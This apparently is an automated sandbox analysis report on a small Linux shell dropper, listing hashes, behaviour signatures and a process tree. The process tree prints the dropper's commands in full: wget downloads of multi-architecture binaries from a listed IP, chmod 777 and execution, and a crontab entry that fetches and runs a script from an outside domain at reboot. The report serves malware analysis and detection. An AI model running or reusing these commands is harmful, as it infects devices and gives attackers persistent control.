Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-01-2025 16:09
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
l.sh
-
Size
240B
-
MD5
e2102b077fa0da3be5a5b07b22a34d20
-
SHA1
629a840f9cbd82d8126f2e6b26f4668af8757f10
-
SHA256
6f6de7f166f98d6391f52362327abeae69469b3dd8e09db11c11615a2c5cb31f
-
SHA512
3db852f800118e0a6343e3d121db6eeb851ae72856ec4e7b07edb665e151811b2b6435706795370550cdeaf8b9816b64d42e6c317a1b6c781660905876873fdf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 702 chmod 734 chmod 737 chmod 743 chmod 746 chmod 752 chmod 704 sh 740 chmod 749 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/upnp 703 upnp /tmp/upnp 735 upnp /tmp/upnp 738 upnp /tmp/upnp 741 upnp /tmp/upnp 744 upnp /tmp/upnp 747 upnp /tmp/upnp 750 upnp /tmp/upnp 753 upnp -
Renames itself 1 IoCs
pid Process 703 upnp -
Unexpected DNS network traffic destination 4 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 178.254.22.166 Destination IP 202.61.197.122 Destination IP 139.84.165.176 Destination IP 185.181.61.24 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.CG9uCL crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS 703 upnp -
description ioc Process File opened for reading /proc/2/cmdline upnp File opened for reading /proc/733/status upnp File opened for reading /proc/766/status upnp File opened for reading /proc/772/status upnp File opened for reading /proc/14/stat killall File opened for reading /proc/17/stat killall File opened for reading /proc/717/status upnp File opened for reading /proc/671/cmdline upnp File opened for reading /proc/752/status upnp File opened for reading /proc/740/status upnp File opened for reading /proc/3/stat killall File opened for reading /proc/15/stat killall File opened for reading /proc/18/stat killall File opened for reading /proc/22/stat killall File opened for reading /proc/286/stat killall File opened for reading /proc/732/status upnp File opened for reading /proc/767/status upnp File opened for reading /proc/670/stat killall File opened for reading /proc/filesystems crontab File opened for reading /proc/mounts upnp File opened for reading /proc/729/status upnp File opened for reading /proc/748/status upnp File opened for reading /proc/761/status upnp File opened for reading /proc/43/stat killall File opened for reading /proc/751/status upnp File opened for reading /proc/764/status upnp File opened for reading /proc/779/status upnp File opened for reading /proc/9/stat killall File opened for reading /proc/719/status upnp File opened for reading /proc/782/status upnp File opened for reading /proc/784/status upnp File opened for reading /proc/5/stat killall File opened for reading /proc/333/stat killall File opened for reading /proc/742/status upnp File opened for reading /proc/113/stat killall File opened for reading /proc/144/cmdline killall File opened for reading /proc/147/stat killall File opened for reading /proc/605/stat killall File opened for reading /proc/781/status upnp File opened for reading /proc/29/stat killall File opened for reading /proc/663/stat killall File opened for reading /proc/749/status upnp File opened for reading /proc/24/stat killall File opened for reading /proc/664/stat killall File opened for reading /proc/718/status upnp File opened for reading /proc/721/status upnp File opened for reading /proc/2/stat killall File opened for reading /proc/716/status upnp File opened for reading /proc/722/status upnp File opened for reading /proc/768/status upnp File opened for reading /proc/4/stat killall File opened for reading /proc/42/stat killall File opened for reading /proc/676/cmdline upnp File opened for reading /proc/771/status upnp File opened for reading /proc/775/status upnp File opened for reading /proc/1/stat killall File opened for reading /proc/20/stat killall File opened for reading /proc/115/stat killall File opened for reading /proc/145/stat killall File opened for reading /proc/624/stat killall File opened for reading /proc/743/status upnp File opened for reading /proc/19/stat killall File opened for reading /proc/325/stat killall File opened for reading /proc/12/stat killall -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 742 wget 744 upnp -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/upnp l.sh
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to tmp directory
PID:671 -
/usr/bin/killallkillall -9 dvrLocker2⤵
- Reads runtime system information
PID:672
-
-
/bin/rmrm -rf upnp2⤵PID:674
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm -O -2⤵PID:677
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/upnp./upnp tplink.arm2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:703 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:704 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:706
-
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:707
-
-
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm5 -O -2⤵PID:711
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/upnp./upnp tplink.arm52⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵PID:736
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
PID:738
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm7 -O -2⤵PID:739
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/upnp./upnp tplink.arm72⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mips -O -2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/upnp./upnp tplink.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:744
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mpsl -O -2⤵PID:745
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/upnp./upnp tplink.mpsl2⤵
- Executes dropped EXE
PID:747
-
-
/usr/bin/wgetwget http://103.188.82.218/t/ppc -O -2⤵PID:748
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/upnp./upnp tplink.ppc2⤵
- Executes dropped EXE
PID:750
-
-
/usr/bin/wgetwget http://103.188.82.218/t/x86 -O -2⤵PID:751
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/upnp./upnp tplink.x862⤵
- Executes dropped EXE
PID:753
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
306B
MD5d3c47c0babeefea998caaf4433d1dd9f
SHA1f0a1e0a98ab8234bd25033c9a31f14be3a105478
SHA256676a2325ae1aa7d75da433cc14f86556afda170b85e99c771f825f9d26c123b5
SHA512c8e991657e763bb13907c30dfa1fb176d05517ef42b88e4eef352f10499bb29eabdf4f55bb9869c74968ede5cac8c1d557988d3bb5efec773b1eacf5b1daca4e